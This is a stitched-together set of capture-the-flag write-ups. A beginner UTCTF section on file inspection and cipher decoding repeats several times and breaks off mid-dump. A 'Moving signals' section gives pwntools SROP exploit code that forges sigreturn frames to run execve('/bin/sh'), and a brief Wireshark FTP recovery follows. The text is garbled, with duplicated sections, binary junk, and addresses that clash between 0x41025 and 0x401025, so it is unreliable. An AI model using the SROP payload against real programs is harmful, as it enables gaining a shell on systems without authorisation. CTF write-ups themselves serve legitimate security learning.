```shell~/Downloads$ file out.txt out.txt: PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced``` OK now we know it is a png file, lets use the default image viewer Eye of Gnome to check out the file ```shell~/Downloads$ eog out.txt``` ![](./images/utctf001b.png) Now we have the flag.utflag{file_extensions_mean_nothing} ### Run ElfDescription:*Anyone know how to run an ELF file? I bet you could figure it out.* We get a run file. Again lets check it out with 'file'```shell~/Downloads$ file runrun: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e29057709baef974009b1e676fd113ed20f1942f, for GNU/Linux 3.2.0, not stripped```Lets check to see what the file permissions are with 'ls'```shell~/Downloads$ ls -l run-rw-rw-r-- 1 jim jim 16600 Mar 13 07:56 run```OK So we see it is not an executable file. Lets make it so.```~/Downloads$ chmod +x run ~/Downloads$ ls -l run-rwxrwxr-x 1 jim jim 16600 Mar 13 07:56 run``` We can now see the executable bit in place. SO to run the file we do it within the current folder.```shell~/Downloads$ ./runutflag{run_run_binary_9312854}``` We now get the flag. utflag{run_run_binary_9312854} ### Cipher GauntletDescription:*Can you make it through all of the encodings and ciphers?* We get a text file. Again lets check it out with 'cat'```shell/Downloads$ cat secret.txt 01010101 01101000 00101101 01101111 01101000 00101100 00100000 01101100 01101111 01101111 01101011 01110011 00100000 01101100 01101001 01101011 01100101 00100000 01110111 01100101 00100000 01101000 01100001 01110110 01100101 00100000 01100001 01101110 01101111 01110100 01101000 01100101 01110010 00100000 01100010 01101100 01101111 01100011 01101011 00100000 01101111 01100110 00100000 01110100 01100101 01111000 01110100 00101100 00100000 01110111 01101001 01110100 01101000 00100000 01110011 01101111``` OK there is a lot of what appears to be binary code. With it being a challenge with a lot of codes and ciphers, lets upload the file to GCHQ's CyberChef. This will allow us to add a number of sections to 'bake' a solution. Right lets try binary first. We get a new selection of text with some instructions. ```Uh-oh, looks like we have another block of text, with some sort of special encoding. Can you figure out what this encoding is? (hint: if you look carefully, you'll notice that there only characters present are A-Z, a-z, 0-9, and sometimes / and +. See if you can find an encoding that looks like this one.)TmV3IGNoYWxsZW5nZSEgQ2FuIHlvdSBmaWd1cmUgb3V0IHdoYXQncyBnb2luZyBvbiBoZXJlPyBJdCBsb29rcyBsaWtlIHRoZSBsZXR0ZXJzIGFyZSBzaGlmdGVkIGJ5IHNvbWUgY29uc3RhbnQuIChoaW50OiB5b3UgbWlnaHQgd2FudCB0byBzdGFydCBsb29raW5nIHVwIFJvbWFuIHBlb3BsZSkuCm15eHFia2Rldmtkc3l4YyEgaXllIHJrZm8gcHN4c2Nyb24gZHJvIGxvcXN4eG9iIG1iaXpkeXFia3pyaSBtcmt2dm94cW8uIHJvYm8gc2MgayBwdmtxIHB5YiBrdnYgaXllYiBya2JuIG9wcHliZGM6IGVkcHZrcXt4eWdfaXllYm9fenZraXN4cV9nc2RyX21iaXpkeX0uIGl5ZSBnc3Z2IHBzeG4gZHJrZCBrIHZ5ZCB5cCBtYml6ZHlxYmt6cmkgc2MgbGVzdm5zeHEgeXBwIGRyc2MgY3liZCB5cCBsa2NzbSB1eHlndm9ucW8sIGt4biBzZCBib2t2dmkgc2MgeHlkIGN5IGxrbiBrcGRvYiBrdnYuIHJ5em8gaXllIG94dHlpb24gZHJvIG1ya3Z2b3hxbyE=``` The spacer at the end of the code indicates that it might be Base64. Lets try that in Cyberchef.```New challenge! Can you figure out what's going on here? It looks like the letters are shifted by some constant. (hint: you might want to start looking up Roman people).myxqbkdevkdsyxc! iye rkfo psxscron dro loqsxxob mbizdyqbkzri mrkvvoxqo. robo sc k pvkq pyb kvv iyeb rkbn oppybdc: edpvkq{xyg_iyebo_zvkisxq_gsdr_mbizdy}. iye gsvv psxn drkd k vyd yp mbizdyqbkzri sc lesvnsxq ypp drsc cybd yp lkcsm uxygvonqo, kxn sd bokvvi sc xyd cy lkn kpdob kvv. ryzo iye oxtyion dro mrkvvoxqo!``` The hint here relates to Romans. They used to use a Caesar Cipher which is a rotating cipher. In CyberChef they call this ROT13. Lets try that.```zlkdoxqrixqflkp! vlr exsb cfkfpeba qeb ybdfkkbo zovmqldoxmev zexiibkdb. ebob fp x cixd clo xii vlro exoa bccloqp: rqcixd{klt_vlrob_mixvfkd_tfqe_zovmql}. vlr tfii cfka qexq x ilq lc zovmqldoxmev fp yrfiafkd lcc qefp ploq lc yxpfz hkltibadb, xka fq obxiiv fp klq pl yxa xcqbo xii. elmb vlr bkglvba qeb zexiibkdb!```So even though it is ROT13, we still can't read the file. However the hint says it is shifted, so we have an option to change this. Click on the updown arrows to shift by one each time and watch the code change. When youhit shift 16, we have the final flag.```congratulations! you have finished the beginner cryptography challenge. here is a flag for all your hard efforts: utflag{now_youre_playing_with_crypto}. you will find that a lot of cryptography is building off this sort of basic knowledge, and it really is not so bad after all. hope you enjoyed the challenge!``` The flag utflag{now_youre_playing_with_crypto} ### Sizzling BaconDescription:*My buddy Francis is _really_ into Bacon. He loves it so much that he gave me this encoded bacon-themed flag (he said he was inspired by the sound of sizzling bacon).* We get a text string. *sSsSSsSSssSSsSsSsSssSSSSSSSssS{SSSsSsSSSsSsSSSsSSsSSssssssSSSSSSSsSSSSSSSSsSSsssSSssSsSSSsSSsSSSSssssSSsssSSsSSsSSSs}* Bacon is highlighted a number of times. If we do a search for bacon and cipher, we find that it does exist. From wikipedia:*Bacon's cipher or the Baconian cipher is a method of steganographic message encoding devised by Francis Bacon in 1605. A message is concealed in the presentation of text, rather than its content.* We can use CyberChef again. Simply search for Bacon and it brings up the Bacon Cipher Decode Operation. Play about with the options:- Alphabet (Complete)- Translation (Case) And we get the flag:UTFLAGCRISPYBACONCIPHERAmend it with braces and #boom, the next flag. UTFLAG{CRISPYBACONCIPHER}
## beginner ### stringy thingsDescription:*I know there's a string in this binary somewhere.... Now where did I leave it?* We get a calc file. lets use the command 'file' to see what it actually is:```shell~/Downloads$ file calccalc: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=8be49a90c694a4f14dd0735d7ad2ffb200753cfb, for GNU/Linux 3.2.0, not stripped```So an ELF file is an executable in Linux. It gets generated after it has been through the complile and build process in an SDK (Software Development Kit) So generallty we can read all files in Linux so lets see what it shows us.```shell~/Downloads$ cat calc ELF>`@:@8 @@@@h����� ���-�=�=X`�-�=�=����DDP�td� � � 44Q�tdR�td�-�=�=/lib64/ld-linux-x86-64.so.2GNU�䚐Ɣ��M�s]z���u<�GNUs !7� � `� � !�=�=�=�?@0@@@��P��=�������!����=��=��=�� @�Y��@@ 7"abi-note.c__abi_taginit.ccrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrycalc.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTable_edata__stack_chk_fail@@GLIBC_2.4printf@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmain__isoc99_scanf@@GLIBC_2.7__TMC_END___ITM_registerTMCloneTable__cxa_finalize@@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.got.plt.data.bss.comment�#��$6�� D�N�o� �� � 4�!!������=�-��?��@�0@0@@@�0@0X0`5��� �6S```This is only part of the file but it gives us an idea but is not an easy way to read and doesn't really give us any clues. Having read it with cat, we notice that it gives us a mix of human and other character types. With the title hinting towards the 'strings' command. Let's give that a go. From the man page:*_strings_ is mainly useful for determining the contents of non-text files. ... _strings_(1) - Linux man page. Name. strings- print the strings of printable characters in files.* ```shell~/Downloads$ strings calc/lib64/ld-linux-x86-64.so.2__isoc99_scanf__stack_chk_failprintf__cxa_finalize__libc_start_mainlibc.so.6GLIBC_2.7GLIBC_2.2.5GLIBC_2.4_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableu3UH[]A\A]A^A_Enter an operator (+, -, *,): Enter two operands: %lf %lf%.1lf + %.1lf = %.1lf%.1lf - %.1lf = %.1lf%.1lf * %.1lf = %.1lf%.1lf / %.1lf = %.1lfError! operator is not correct``` Now that is easier to read as it is by line. However there are 87 lines to look through and the types of file can contain thousands of lines. What we can use is a command that will help us look for patterns. In this case 'grep'Again utilising the man page:*The _grep_ utility shall search the input files, selecting lines matching one or more patterns; the types of patterns are controlled by the options specified.* OK Can we just 'grep' the file calc? Yes we could and it would give us the same answer. But since we have already used 'strings', lets take that output and put it into 'grep'. To do this in Linux, we 'pipe' it from one command into another.*strings | grep* One more thing. Now grep is used to find patterns but we need to give it some options. Generally we know the CTF flag stype and in this case it is utflag{} with words between the brackets. That being the case we can ask 'grep' to search for this pattern and if we generalise the characters withing it (i.e. search for anything in there) then we should be able to print off the flag. ```shell~/Downloads$ strings calc | grep -oE utflag{.?*}utflag{strings_is_op}```- -o, --only-matching (show only nonempty parts of lines that match)- -E, --extended-regexp (PATTERNS are extended regular expressions) As I mentioned we can do this to the file so the command is still the same, less strings but adding the file name.```shell~/Downloads$ grep -oEa utflag{.?*} calc utflag{strings_is_op}``` And finally we can actually use 'cat'. The only difference is that his time, we need to tell 'grep' that we are reading as text.```shell~/Downloads$ cat calc | grep -oE utflag{.?*}Binary file (standard input) matches```Here without -a it tells us it finds a match in a binary file.```~/Downloads$ cat calc | grep -oEa utflag{.?*}utflag{strings_is_op}``` Adding the additional option of -a now finds the flag. - -a, --text (equivalent to --binary-files=text) ### HTMLDescription:*I hid a flag somewhere in the code of the UTCTF website, can you find it?* We get a link to the website. https://www.isss.io/utctf/ Lets look at the source code and bang!! We have the flag. ![](./images/utctf001a.png) utflag{you_found_me_0123959} ### Magic BytesDescription:*My friend sent me this text file and said they put a flag inside. I opened it and it doesn't look like a normal text file to me! Maybe you'll be able to find it.* We get a .txt file. Again lets check it out with 'file' ```shell~/Downloads$ file out.txt out.txt: PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced``` OK now we know it is a png file, lets use the default image viewer Eye of Gnome to check out the file ```shell~/Downloads$ eog out.txt``` ![](./images/utctf001b.png) Now we have the flag.utflag{file_extensions_mean_nothing} ### Run ElfDescription:*Anyone know how to run an ELF file? I bet you could figure it out.* We get a run file. Again lets check it out with 'file'```shell~/Downloads$ file runrun: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e29057709baef974009b1e676fd113ed20f1942f, for GNU/Linux 3.2.0, not stripped```Lets check to see what the file permissions are with 'ls'```shell~/Downloads$ ls -l run-rw-rw-r-- 1 jim jim 16600 Mar 13 07:56 run```OK So we see it is not an executable file. Lets make it so.```~/Downloads$ chmod +x run ~/Downloads$ ls -l run-rwxrwxr-x 1 jim jim 16600 Mar 13 07:56 run``` We can now see the executable bit in place. SO to run the file we do it within the current folder.```shell~/Downloads$ ./runutflag{run_run_binary_9312854}``` We now get the flag. utflag{run_run_binary_9312854} ### Cipher GauntletDescription:*Can you make it through all of the encodings and ciphers?* We get a text file. Again lets check it out with 'cat'```shell/Downloads$ cat secret.txt 01010101 01101000 00101101 01101111 01101000 00101100 00100000 01101100 01101111 01101111 01101011 01110011 00100000 01101100 01101001 01101011 01100101 00100000 01110111 01100101 00100000 01101000 01100001 01110110 01100101 00100000 01100001 01101110 01101111 01110100 01101000 01100101 01110010 00100000 01100010 01101100 01101111 01100011 01101011 00100000 01101111 01100110 00100000 01110100 01100101 01111000 01110100 00101100 00100000 01110111 01101001 01110100 01101000 00100000 01110011 01101111``` OK there is a lot of what appears to be binary code. With it being a challenge with a lot of codes and ciphers, lets upload the file to GCHQ's CyberChef. This will allow us to add a number of sections to 'bake' a solution. Right lets try binary first. We get a new selection of text with some instructions. ```Uh-oh, looks like we have another block of text, with some sort of special encoding. Can you figure out what this encoding is? (hint: if you look carefully, you'll notice that there only characters present are A-Z, a-z, 0-9, and sometimes / and +. See if you can find an encoding that looks like this one.)TmV3IGNoYWxsZW5nZSEgQ2FuIHlvdSBmaWd1cmUgb3V0IHdoYXQncyBnb2luZyBvbiBoZXJlPyBJdCBsb29rcyBsaWtlIHRoZSBsZXR0ZXJzIGFyZSBzaGlmdGVkIGJ5IHNvbWUgY29uc3RhbnQuIChoaW50OiB5b3UgbWlnaHQgd2FudCB0byBzdGFydCBsb29raW5nIHVwIFJvbWFuIHBlb3BsZSkuCm15eHFia2Rldmtkc3l4YyEgaXllIHJrZm8gcHN4c2Nyb24gZHJvIGxvcXN4eG9iIG1iaXpkeXFia3pyaSBtcmt2dm94cW8uIHJvYm8gc2MgayBwdmtxIHB5YiBrdnYgaXllYiBya2JuIG9wcHliZGM6IGVkcHZrcXt4eWdfaXllYm9fenZraXN4cV9nc2RyX21iaXpkeX0uIGl5ZSBnc3Z2IHBzeG4gZHJrZCBrIHZ5ZCB5cCBtYml6ZHlxYmt6cmkgc2MgbGVzdm5zeHEgeXBwIGRyc2MgY3liZCB5cCBsa2NzbSB1eHlndm9ucW8sIGt4biBzZCBib2t2dmkgc2MgeHlkIGN5IGxrbiBrcGRvYiBrdnYuIHJ5em8gaXllIG94dHlpb24gZHJvIG1ya3Z2b3hxbyE=``` The spacer at the end of the code indicates that it might be Base64. Lets try that in Cyberchef.```New challenge! Can you figure out what's going on here? It looks like the letters are shifted by some constant. (hint: you might want to start looking up Roman people).myxqbkdevkdsyxc! iye rkfo psxscron dro loqsxxob mbizdyqbkzri mrkvvoxqo. robo sc k pvkq pyb kvv iyeb rkbn oppybdc: edpvkq{xyg_iyebo_zvkisxq_gsdr_mbizdy}. iye gsvv psxn drkd k vyd yp mbizdyqbkzri sc lesvnsxq ypp drsc cybd yp lkcsm uxygvonqo, kxn sd bokvvi sc xyd cy lkn kpdob kvv. ryzo iye oxtyion dro mrkvvoxqo!``` The hint here relates to Romans. They used to use a Caesar Cipher which is a rotating cipher. In CyberChef they call this ROT13. Lets try that.```zlkdoxqrixqflkp! vlr exsb cfkfpeba qeb ybdfkkbo zovmqldoxmev zexiibkdb. ebob fp x cixd clo xii vlro exoa bccloqp: rqcixd{klt_vlrob_mixvfkd_tfqe_zovmql}. vlr tfii cfka qexq x ilq lc zovmqldoxmev fp yrfiafkd lcc qefp ploq lc yxpfz hkltibadb, xka fq obxiiv fp klq pl yxa xcqbo xii. elmb vlr bkglvba qeb zexiibkdb!```So even though it is ROT13, we still can't read the file. However the hint says it is shifted, so we have an option to change this. Click on the updown arrows to shift by one each time and watch the code change. When youhit shift 16, we have the final flag.```congratulations! you have finished the beginner cryptography challenge. here is a flag for all your hard efforts: utflag{now_youre_playing_with_crypto}. you will find that a lot of cryptography is building off this sort of basic knowledge, and it really is not so bad after all. hope you enjoyed the challenge!``` The flag utflag{now_youre_playing_with_crypto} ### Sizzling BaconDescription:*My buddy Francis is _really_ into Bacon. He loves it so much that he gave me this encoded bacon-themed flag (he said he was inspired by the sound of sizzling bacon).* We get a text string. *sSsSSsSSssSSsSsSsSssSSSSSSSssS{SSSsSsSSSsSsSSSsSSsSSssssssSSSSSSSsSSSSSSSSsSSsssSSssSsSSSsSSsSSSSssssSSsssSSsSSsSSSs}* Bacon is highlighted a number of times. If we do a search for bacon and cipher, we find that it does exist. From wikipedia:*Bacon's cipher or the Baconian cipher is a method of steganographic message encoding devised by Francis Bacon in 1605. A message is concealed in the presentation of text, rather than its content.* We can use CyberChef again. Simply search for Bacon and it brings up the Bacon Cipher Decode Operation. Play about with the options:- Alphabet (Complete)- Translation (Case) And we get the flag:UTFLAGCRISPYBACONCIPHERAmend it with braces and #boom, the next flag. UTFLAG{CRISPYBACONCIPHER}
# Moving signals#### DescriptionWe don't like giving binaries that contain loads of information, so we decided that a small program should do for this challenge. Even written in some custom assembly. I wonder how this could be exploited.#### AuthorTango#### Points and solves442 points, 91 solves. We are given an extermly small binary: ```asm0x0000000000041000 <+0>: mov rdi,0x00x0000000000041007 <+7>: mov rsi,rsp0x000000000004100a <+10>: sub rsi,0x80x000000000004100e <+14>: mov rdx,0x1f40x0000000000041015 <+21>: syscall0x0000000000041017 <+23>: ret0x0000000000041018 <+24>: pop rax0x0000000000041019 <+25>: ret``` ## The vulnerability:Well, of course we have full control over ```rip``` using the read syscall.In addition we have a ```syscall``` gadget to use for ```sigreturn``` and ```execve``` ## 1. Getting sigreturn:```pythonpayload = b"A"*8 + p64(pop_rax) + p64(15) + p64(syscall_ret)frame = SigreturnFrame()frame.rax = 0frame.rdi = 0frame.rsi = 0x41025frame.rdx = 0x300frame.rsp = 0x41025frame.rip = syscall_retpayload += bytes(frame)p.send(payload)```This payload sets ```rax = 0xf``` and syscalls, the frame that is loaded gives the registers the values:1. ```rax = 0``` for ```read``` syscall2. ```rdi = 0``` for ```stdin```3. ```rsi = 0x401025``` is the only known address that is also writeable, (which is right after the given code)4. ```rsp = 0x401025``` is to align the stack right back to where we are reading into.5. ```rip = syscall_ret``` to execute this read syscall.Basically we read the next phase of this exploit into the code segment of the binary, and after that has been done, We will return to whatever that will be written to address ```0x401025``` ## 2. Getting shell:```pythonpayload = p64(pop_rax) + p64(15) + p64(syscall_ret)frame = SigreturnFrame()frame.rax = 59frame.rdi = 0x41025+248 + 0x18frame.rsi = 0frame.rdx = 0frame.rsp = 0x41000frame.rip = syscall_retpayload += bytes(frame) + b"/bin/sh\x00"``` This utilizes another ```sigreturn``` to load the values required to perform ```execve(/bin/sh)```1. ```rax = 59``` for ```execve``` syscall2. ```rdi = 0x401026 + 248 + 0x18``` for the address that ```/bin/sh``` will be on the stack.3. ```rsp = 0x41000``` just to have some stack space for saftey. And we get shell :). #### Flag```flag{s1gROPp1ty_r0p_321321}```
## beginner ### stringy thingsDescription:*I know there's a string in this binary somewhere.... Now where did I leave it?* We get a calc file. lets use the command 'file' to see what it actually is:```shell~/Downloads$ file calccalc: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=8be49a90c694a4f14dd0735d7ad2ffb200753cfb, for GNU/Linux 3.2.0, not stripped```So an ELF file is an executable in Linux. It gets generated after it has been through the complile and build process in an SDK (Software Development Kit) So generallty we can read all files in Linux so lets see what it shows us.```shell~/Downloads$ cat calc ELF>`@:@8 @@@@h����� ���-�=�=X`�-�=�=����DDP�td� � � 44Q�tdR�td�-�=�=/lib64/ld-linux-x86-64.so.2GNU�䚐Ɣ��M�s]z���u<�GNUs !7� � `� � !�=�=�=�?@0@@@��P��=�������!����=��=��=�� @�Y��@@ 7"abi-note.c__abi_taginit.ccrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrycalc.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTable_edata__stack_chk_fail@@GLIBC_2.4printf@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmain__isoc99_scanf@@GLIBC_2.7__TMC_END___ITM_registerTMCloneTable__cxa_finalize@@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.got.plt.data.bss.comment�#��$6�� D�N�o� �� � 4�!!������=�-��?��@�0@0@@@�0@0X0`5��� �6S```This is only part of the file but it gives us an idea but is not an easy way to read and doesn't really give us any clues. Having read it with cat, we notice that it gives us a mix of human and other character types. With the title hinting towards the 'strings' command. Let's give that a go. From the man page:*_strings_ is mainly useful for determining the contents of non-text files. ... _strings_(1) - Linux man page. Name. strings- print the strings of printable characters in files.* ```shell~/Downloads$ strings calc/lib64/ld-linux-x86-64.so.2__isoc99_scanf__stack_chk_failprintf__cxa_finalize__libc_start_mainlibc.so.6GLIBC_2.7GLIBC_2.2.5GLIBC_2.4_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableu3UH[]A\A]A^A_Enter an operator (+, -, *,): Enter two operands: %lf %lf%.1lf + %.1lf = %.1lf%.1lf - %.1lf = %.1lf%.1lf * %.1lf = %.1lf%.1lf / %.1lf = %.1lfError! operator is not correct``` Now that is easier to read as it is by line. However there are 87 lines to look through and the types of file can contain thousands of lines. What we can use is a command that will help us look for patterns. In this case 'grep'Again utilising the man page:*The _grep_ utility shall search the input files, selecting lines matching one or more patterns; the types of patterns are controlled by the options specified.* OK Can we just 'grep' the file calc? Yes we could and it would give us the same answer. But since we have already used 'strings', lets take that output and put it into 'grep'. To do this in Linux, we 'pipe' it from one command into another.*strings | grep* One more thing. Now grep is used to find patterns but we need to give it some options. Generally we know the CTF flag stype and in this case it is utflag{} with words between the brackets. That being the case we can ask 'grep' to search for this pattern and if we generalise the characters withing it (i.e. search for anything in there) then we should be able to print off the flag. ```shell~/Downloads$ strings calc | grep -oE utflag{.?*}utflag{strings_is_op}```- -o, --only-matching (show only nonempty parts of lines that match)- -E, --extended-regexp (PATTERNS are extended regular expressions) As I mentioned we can do this to the file so the command is still the same, less strings but adding the file name.```shell~/Downloads$ grep -oEa utflag{.?*} calc utflag{strings_is_op}``` And finally we can actually use 'cat'. The only difference is that his time, we need to tell 'grep' that we are reading as text.```shell~/Downloads$ cat calc | grep -oE utflag{.?*}Binary file (standard input) matches```Here without -a it tells us it finds a match in a binary file.```~/Downloads$ cat calc | grep -oEa utflag{.?*}utflag{strings_is_op}``` Adding the additional option of -a now finds the flag. - -a, --text (equivalent to --binary-files=text) ### HTMLDescription:*I hid a flag somewhere in the code of the UTCTF website, can you find it?* We get a link to the website. https://www.isss.io/utctf/ Lets look at the source code and bang!! We have the flag. ![](./images/utctf001a.png) utflag{you_found_me_0123959} ### Magic BytesDescription:*My friend sent me this text file and said they put a flag inside. I opened it and it doesn't look like a normal text file to me! Maybe you'll be able to find it.* We get a .txt file. Again lets check it out with 'file' ```shell~/Downloads$ file out.txt out.txt: PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced``` OK now we know it is a png file, lets use the default image viewer Eye of Gnome to check out the file ```shell~/Downloads$ eog out.txt``` ![](./images/utctf001b.png) Now we have the flag.utflag{file_extensions_mean_nothing} ### Run ElfDescription:*Anyone know how to run an ELF file? I bet you could figure it out.* We get a run file. Again lets check it out with 'file'```shell~/Downloads$ file runrun: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e29057709baef974009b1e676fd113ed20f1942f, for GNU/Linux 3.2.0, not stripped```Lets check to see what the file permissions are with 'ls'```shell~/Downloads$ ls -l run-rw-rw-r-- 1 jim jim 16600 Mar 13 07:56 run```OK So we see it is not an executable file. Lets make it so.```~/Downloads$ chmod +x run ~/Downloads$ ls -l run-rwxrwxr-x 1 jim jim 16600 Mar 13 07:56 run``` We can now see the executable bit in place. SO to run the file we do it within the current folder.```shell~/Downloads$ ./runutflag{run_run_binary_9312854}``` We now get the flag. utflag{run_run_binary_9312854} ### Cipher GauntletDescription:*Can you make it through all of the encodings and ciphers?* We get a text file. Again lets check it out with 'cat'```shell/Downloads$ cat secret.txt 01010101 01101000 00101101 01101111 01101000 00101100 00100000 01101100 01101111 01101111 01101011 01110011 00100000 01101100 01101001 01101011 01100101 00100000 01110111 01100101 00100000 01101000 01100001 01110110 01100101 00100000 01100001 01101110 01101111 01110100 01101000 01100101 01110010 00100000 01100010 01101100 01101111 01100011 01101011 00100000 01101111 01100110 00100000 01110100 01100101 01111000 01110100 00101100 00100000 01110111 01101001 01110100 01101000 00100000 01110011 01101111``` OK there is a lot of what appears to be binary code. With it being a challenge with a lot of codes and ciphers, lets upload the file to GCHQ's CyberChef. This will allow us to add a number of sections to 'bake' a solution. Right lets try binary first. We get a new selection of text with some instructions. ```Uh-oh, looks like we have another block of text, with some sort of special encoding. Can you figure out what this encoding is? (hint: if you look carefully, you'll notice that there only characters present are A-Z, a-z, 0-9, and sometimes / and +. See if you can find an encoding that looks like this one.)TmV3IGNoYWxsZW5nZSEgQ2FuIHlvdSBmaWd1cmUgb3V0IHdoYXQncyBnb2luZyBvbiBoZXJlPyBJdCBsb29rcyBsaWtlIHRoZSBsZXR0ZXJzIGFyZSBzaGlmdGVkIGJ5IHNvbWUgY29uc3RhbnQuIChoaW50OiB5b3UgbWlnaHQgd2FudCB0byBzdGFydCBsb29raW5nIHVwIFJvbWFuIHBlb3BsZSkuCm15eHFia2Rldmtkc3l4YyEgaXllIHJrZm8gcHN4c2Nyb24gZHJvIGxvcXN4eG9iIG1iaXpkeXFia3pyaSBtcmt2dm94cW8uIHJvYm8gc2MgayBwdmtxIHB5YiBrdnYgaXllYiBya2JuIG9wcHliZGM6IGVkcHZrcXt4eWdfaXllYm9fenZraXN4cV9nc2RyX21iaXpkeX0uIGl5ZSBnc3Z2IHBzeG4gZHJrZCBrIHZ5ZCB5cCBtYml6ZHlxYmt6cmkgc2MgbGVzdm5zeHEgeXBwIGRyc2MgY3liZCB5cCBsa2NzbSB1eHlndm9ucW8sIGt4biBzZCBib2t2dmkgc2MgeHlkIGN5IGxrbiBrcGRvYiBrdnYuIHJ5em8gaXllIG94dHlpb24gZHJvIG1ya3Z2b3hxbyE=``` The spacer at the end of the code indicates that it might be Base64. Lets try that in Cyberchef.```New challenge! Can you figure out what's going on here? It looks like the letters are shifted by some constant. (hint: you might want to start looking up Roman people).myxqbkdevkdsyxc! iye rkfo psxscron dro loqsxxob mbizdyqbkzri mrkvvoxqo. robo sc k pvkq pyb kvv iyeb rkbn oppybdc: edpvkq{xyg_iyebo_zvkisxq_gsdr_mbizdy}. iye gsvv psxn drkd k vyd yp mbizdyqbkzri sc lesvnsxq ypp drsc cybd yp lkcsm uxygvonqo, kxn sd bokvvi sc xyd cy lkn kpdob kvv. ryzo iye oxtyion dro mrkvvoxqo!``` The hint here relates to Romans. They used to use a Caesar Cipher which is a rotating cipher. In CyberChef they call this ROT13. Lets try that.```zlkdoxqrixqflkp! vlr exsb cfkfpeba qeb ybdfkkbo zovmqldoxmev zexiibkdb. ebob fp x cixd clo xii vlro exoa bccloqp: rqcixd{klt_vlrob_mixvfkd_tfqe_zovmql}. vlr tfii cfka qexq x ilq lc zovmqldoxmev fp yrfiafkd lcc qefp ploq lc yxpfz hkltibadb, xka fq obxiiv fp klq pl yxa xcqbo xii. elmb vlr bkglvba qeb zexiibkdb!```So even though it is ROT13, we still can't read the file. However the hint says it is shifted, so we have an option to change this. Click on the updown arrows to shift by one each time and watch the code change. When youhit shift 16, we have the final flag.```congratulations! you have finished the beginner cryptography challenge. here is a flag for all your hard efforts: utflag{now_youre_playing_with_crypto}. you will find that a lot of cryptography is building off this sort of basic knowledge, and it really is not so bad after all. hope you enjoyed the challenge!``` The flag utflag{now_youre_playing_with_crypto} ### Sizzling BaconDescription:*My buddy Francis is _really_ into Bacon. He loves it so much that he gave me this encoded bacon-themed flag (he said he was inspired by the sound of sizzling bacon).* We get a text string. *sSsSSsSSssSSsSsSsSssSSSSSSSssS{SSSsSsSSSsSsSSSsSSsSSssssssSSSSSSSsSSSSSSSSsSSsssSSssSsSSSsSSsSSSSssssSSsssSSsSSsSSSs}* Bacon is highlighted a number of times. If we do a search for bacon and cipher, we find that it does exist. From wikipedia:*Bacon's cipher or the Baconian cipher is a method of steganographic message encoding devised by Francis Bacon in 1605. A message is concealed in the presentation of text, rather than its content.* We can use CyberChef again. Simply search for Bacon and it brings up the Bacon Cipher Decode Operation. Play about with the options:- Alphabet (Complete)- Translation (Case) And we get the flag:UTFLAGCRISPYBACONCIPHERAmend it with braces and #boom, the next flag. UTFLAG{CRISPYBACONCIPHER}
Viewing the Protocol statistics in Wireshark, we see that the majority of the PCAP is FTP traffic. Applying the filter `ftp || ftp-data` allows us to view only the FTP traffic. Scrolling through we see multiple files being moved, and one of them is called `butter.jpg` (packets 313 and 314). If we right click on one of these `STOR` requests, then click `Follow -> TCP Stream` we can see the file contents. Change `Show data as` to `Raw`, then save the image with `Save as...`. The flag is in the image. ## Flag**flag{u_p4ss_butt3r}**
## beginner ### stringy thingsDescription:*I know there's a string in this binary somewhere.... Now where did I leave it?* We get a calc file. lets use the command 'file' to see what it actually is:```shell~/Downloads$ file calccalc: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=8be49a90c694a4f14dd0735d7ad2ffb200753cfb, for GNU/Linux 3.2.0, not stripped```So an ELF file is an executable in Linux. It gets generated after it has been through the complile and build process in an SDK (Software Development Kit) So generallty we can read all files in Linux so lets see what it shows us.```shell~/Downloads$ cat calc ELF>`@:@8 @@@@h����� ���-�=�=X`�-�=�=����DDP�td� � � 44Q�tdR�td�-�=�=/lib64/ld-linux-x86-64.so.2GNU�䚐Ɣ��M�s]z���u<�GNUs !7� � `� � !�=�=�=�?@0@@@��P��=�������!����=��=��=�� @�Y��@@ 